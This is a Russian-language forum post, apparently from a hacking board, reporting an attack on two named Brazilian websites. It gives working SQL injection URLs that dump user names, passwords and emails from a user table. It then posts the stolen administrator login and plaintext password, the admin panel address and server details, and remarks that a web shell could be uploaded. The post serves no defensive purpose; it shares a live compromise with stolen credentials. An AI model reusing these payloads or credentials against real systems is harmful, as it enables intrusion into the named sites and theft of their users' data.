|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.sticma.com.br/cursos_ver.php?id=-1+union+select+1,2,concat_ws(0x3a3a,nome,Senha,ema il),4,5,6,7,8,9,10,11+from+usuario+limit+0,1
login:admin
pass:sind2008
Админка:http://www.sticma.com.br/admin
Microsoft-IIS/6.0. PHP/5.2.5
Windows NT WINDOWS 5.2 build 3790
NOT SECURE
Достаточно грамотно выставлены права. Выше корня конкретного хоста не лезет.
Есть возможность залить шелл.
---------------------------------------------------------------
P.S. Студия создавша сей ресурс сама страдает sql-inj.
http://www.fonteweb.com.br/solucoes.php?id=-1+union+select+1,concat_ws(0x3a3a,nome,Senha,email ),3,4,5,6,7+from+usuario+limit+0,1
Хеш не подбрутился. Да и дальше копать не стал.
Но походу у них все проекты плешивые...
|